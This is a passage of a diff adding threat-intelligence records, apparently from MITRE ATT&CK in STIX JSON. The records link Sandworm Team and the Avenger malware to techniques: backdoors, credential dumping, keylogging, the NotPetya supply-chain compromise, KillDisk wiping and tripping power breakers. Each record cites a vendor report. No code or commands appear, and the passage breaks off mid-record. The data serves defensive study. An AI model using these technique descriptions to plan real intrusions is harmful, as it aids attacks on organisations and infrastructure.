+ "id": "relationship--7867218e-78a0-41cf-ada0-8400285b8a1d",
+ "type": "relationship",
+ "modified": "2020-06-11T16:28:58.426Z",
+ "created": "2020-06-10T21:56:40.020Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots July 2017",
+ "url": "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/",
+ "description": "Cherepanov, A.. (2017, July 4). Analysis of TeleBots\u2019 cunning backdoor . Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034)'s VBS backdoor can decode Base64-encoded data and save it to the %TEMP% folder. The group also decrypted received information using the Triple DES algorithm and decompresses it using GZip.(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots July 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--df98db39-fdfd-463c-96b3-e9a8b049f316",
+ "type": "relationship",
+ "modified": "2020-06-11T16:28:58.431Z",
+ "created": "2020-06-10T21:56:40.022Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has sent system information to its C2 server using HTTP.(Citation: ESET Telebots Dec 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--29818fd0-e6df-4871-b025-938c77978544",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:40.034Z",
+ "created": "2020-06-10T21:56:40.034Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used intercepter-NG to sniff passwords in network traffic.(Citation: ESET Telebots Dec 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--03f1e3ee-5c1b-4897-8631-d15ed48a0730",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:40.086Z",
+ "created": "2020-06-10T21:56:40.086Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used a tool to query Active Directory using LDAP, discovering information about usernames listed in AD.(Citation: ESET Telebots Dec 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f6cf6ad8-7a42-4cf5-82ab-45d6a5107aeb",
+ "type": "relationship",
+ "modified": "2020-06-22T15:45:19.153Z",
+ "created": "2020-06-10T21:56:40.084Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used a keylogger to capture keystrokes by using the SetWindowsHookEx function.(Citation: ESET Telebots Dec 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--96c1ab08-b165-447b-afa7-5c1d30cd6219",
+ "type": "relationship",
+ "modified": "2020-06-18T20:24:21.119Z",
+ "created": "2020-06-10T21:56:40.090Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots June 2017",
+ "url": "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
+ "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034)'s plainpwd tool is a modified version of [Mimikatz](https://attack.mitre.org/software/S0002) and dumps Windows credentials from system memory.(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots June 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--b96e67e2-7d82-478e-8bf3-2e8acf8a14dd",
+ "type": "relationship",
+ "modified": "2020-06-11T15:19:18.005Z",
+ "created": "2020-06-10T21:56:40.092Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034)'s CredRaptor tool can collect saved passwords from various internet browsers.(Citation: ESET Telebots Dec 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--6930c084-c02c-4278-8343-6a47fed4fdc0",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:40.105Z",
+ "created": "2020-06-10T21:56:40.105Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034)'s Python backdoor can push additional malicious tools to an infected system.(Citation: ESET Telebots Dec 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--ea80c942-680d-43b4-9cbf-21f2078977ad",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:40.113Z",
+ "created": "2020-06-10T21:56:40.113Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots June 2017",
+ "url": "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
+ "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used the Telegram Bot API from Telegram Messenger to send and receive commands to its Python backdoor. [Sandworm Team](https://attack.mitre.org/groups/G0034) also used legitimate M.E.Doc software update check requests for sending and receiving commands and hosted malicious payloads on putdrive.com.(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--d66da21d-1a8c-4b32-b700-f1d3d938b57e",
+ "type": "relationship",
+ "modified": "2020-06-18T20:24:21.408Z",
+ "created": "2020-06-10T21:56:40.115Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has avoided detection by naming a malicious binary explorer.exe.(Citation: ESET Telebots Dec 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--fed23938-8fbc-4b67-8452-f2f413eed291",
+ "type": "relationship",
+ "modified": "2020-06-18T20:24:21.466Z",
+ "created": "2020-06-10T21:56:40.151Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has delivered spearphishing attachments with malicious macros embedded within files.(Citation: ESET Telebots Dec 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--55fb787a-6622-43c7-a47d-48b4db7e8d81",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:40.153Z",
+ "created": "2020-06-10T21:56:40.153Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c",
+ "external_references": [
+ {
+ "source_name": "US-CERT Ukraine Feb 2016",
+ "url": "https://www.us-cert.gov/ics/alerts/IR-ALERT-H-16-056-01",
+ "description": "US-CERT. (2016, February 25). ICS Alert (IR-ALERT-H-16-056-01) Cyber-Attack Against Ukrainian Critical Infrastructure. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots June 2017",
+ "url": "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
+ "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used the [BlackEnergy](https://attack.mitre.org/software/S0089) KillDisk component to overwrite files on Windows-based Human-Machine Interfaces. (Citation: US-CERT Ukraine Feb 2016)(Citation: ESET Telebots June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--e85a5fe7-cbfe-44b1-b297-d02f531c5fb1",
+ "type": "relationship",
+ "modified": "2020-06-18T17:13:41.880Z",
+ "created": "2020-06-10T21:56:40.179Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9",
+ "external_references": [
+ {
+ "source_name": "US-CERT Ukraine Feb 2016",
+ "url": "https://www.us-cert.gov/ics/alerts/IR-ALERT-H-16-056-01",
+ "description": "US-CERT. (2016, February 25). ICS Alert (IR-ALERT-H-16-056-01) Cyber-Attack Against Ukrainian Critical Infrastructure. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots June 2017",
+ "url": "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
+ "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used the [BlackEnergy](https://attack.mitre.org/software/S0089) KillDisk component to corrupt the infected system's master boot record.(Citation: US-CERT Ukraine Feb 2016)(Citation: ESET Telebots June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--98b6dbac-dac9-4856-9b67-25c49e20448e",
+ "type": "relationship",
+ "modified": "2020-06-11T15:19:18.067Z",
+ "created": "2020-06-10T21:56:40.180Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81",
+ "external_references": [
+ {
+ "source_name": "US-CERT Ukraine Feb 2016",
+ "url": "https://www.us-cert.gov/ics/alerts/IR-ALERT-H-16-056-01",
+ "description": "US-CERT. (2016, February 25). ICS Alert (IR-ALERT-H-16-056-01) Cyber-Attack Against Ukrainian Critical Infrastructure. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) have used previously acquired legitimate credentials prior to attacks.(Citation: US-CERT Ukraine Feb 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--50156329-1c32-4044-9c6e-ee2eb079cd1c",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:40.191Z",
+ "created": "2020-06-10T21:56:40.191Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d",
+ "external_references": [
+ {
+ "source_name": "ESET BlackEnergy Jan 2016",
+ "url": "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/",
+ "description": "Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry . Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots June 2017",
+ "url": "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
+ "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used Dropbear SSH with a hardcoded backdoor password to maintain persistence within the target network. [Sandworm Team](https://attack.mitre.org/groups/G0034) has also used VPN tunnels established in legitimate software company infrastructure to gain access to internal networks of that software company's users.(Citation: ESET BlackEnergy Jan 2016)(Citation: ESET Telebots June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--3d450e48-e73f-417f-941d-85c8658f5d1f",
+ "type": "relationship",
+ "modified": "2020-06-18T20:24:21.696Z",
+ "created": "2020-06-10T21:56:40.250Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "ESET BlackEnergy Jan 2016",
+ "url": "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/",
+ "description": "Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry . Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots June 2017",
+ "url": "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
+ "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has created VBScripts to run an SSH server.(Citation: ESET BlackEnergy Jan 2016)(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--e941da7d-9d23-4ada-b4ae-36f150d70087",
+ "type": "relationship",
+ "modified": "2020-06-11T15:19:18.184Z",
+ "created": "2020-06-10T21:56:40.245Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18",
+ "external_references": [
+ {
+ "source_name": "ESET BlackEnergy Jan 2016",
+ "url": "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/",
+ "description": "Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry . Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used port 6789 to accept connections on the group's SSH server.(Citation: ESET BlackEnergy Jan 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--759af051-f194-4a68-98af-224f7d9916e8",
+ "type": "relationship",
+ "modified": "2020-06-11T15:05:02.087Z",
+ "created": "2020-06-10T21:56:40.267Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7",
+ "external_references": [
+ {
+ "source_name": "US-CERT Ukraine Feb 2016",
+ "url": "https://www.us-cert.gov/ics/alerts/IR-ALERT-H-16-056-01",
+ "description": "US-CERT. (2016, February 25). ICS Alert (IR-ALERT-H-16-056-01) Cyber-Attack Against Ukrainian Critical Infrastructure. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used remote administration tools or remote industrial control system client software to maliciously release electricity breakers.(Citation: US-CERT Ukraine Feb 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--ad949bd4-7ffd-4712-91d8-4a8523db6b50",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:40.261Z",
+ "created": "2020-06-10T21:56:40.261Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00",
+ "external_references": [
+ {
+ "source_name": "Secureworks NotPetya June 2017",
+ "url": "https://www.secureworks.com/blog/notpetya-campaign-what-we-know-about-the-latest-global-ransomware-attack",
+ "description": "Counter Threat Research Team. (2017, June 28). NotPetya Campaign: What We Know About the Latest Global Ransomware Attack. Retrieved June 11, 2020."
+ },
+ {
+ "source_name": "ESET Telebots June 2017",
+ "url": "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
+ "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has distributed [NotPetya](https://attack.mitre.org/software/S0368) by compromising the legitimate Ukrainian accounting software M.E.Doc and replacing a legitimate software update with a malicious one.(Citation: Secureworks NotPetya June 2017)(Citation: ESET Telebots June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--927434d1-b487-4e3c-909d-ac8725555080",
+ "type": "relationship",
+ "modified": "2020-06-11T16:28:58.559Z",
+ "created": "2020-06-11T15:05:01.794Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) has the ability to use HTTP in communication with C2.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--688ff9e6-5482-4019-b092-9e831bbac490",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.403Z",
+ "created": "2020-06-11T16:18:16.732Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) has the ability to identify installed anti-virus products on a compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--50dbe887-4d91-42d3-8e1b-34000ad5a1e7",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.411Z",
+ "created": "2020-06-11T16:18:16.769Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) has the ability to identify the host volume ID and the OS architecture on a compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fc4c0c44-2e94-47c1-9174-fcf0fa1a80b4",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.406Z",
+ "created": "2020-06-11T16:18:16.773Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) has the ability to decrypt files downloaded from C2.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--70b94aa6-7cf1-4cf5-b00b-aed156036f1e",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.400Z",
+ "created": "2020-06-11T16:18:16.767Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
